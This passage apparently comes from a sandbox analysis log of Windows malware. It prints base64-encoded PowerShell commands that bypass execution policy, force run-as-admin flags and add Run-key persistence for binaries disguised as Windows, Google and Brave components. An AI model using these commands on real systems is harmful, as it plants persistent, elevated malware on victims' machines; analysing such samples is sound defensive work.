AiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAA==
      4⤵
      PID:428
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:5920
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8676.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8673.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8674.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8675.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACIAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgB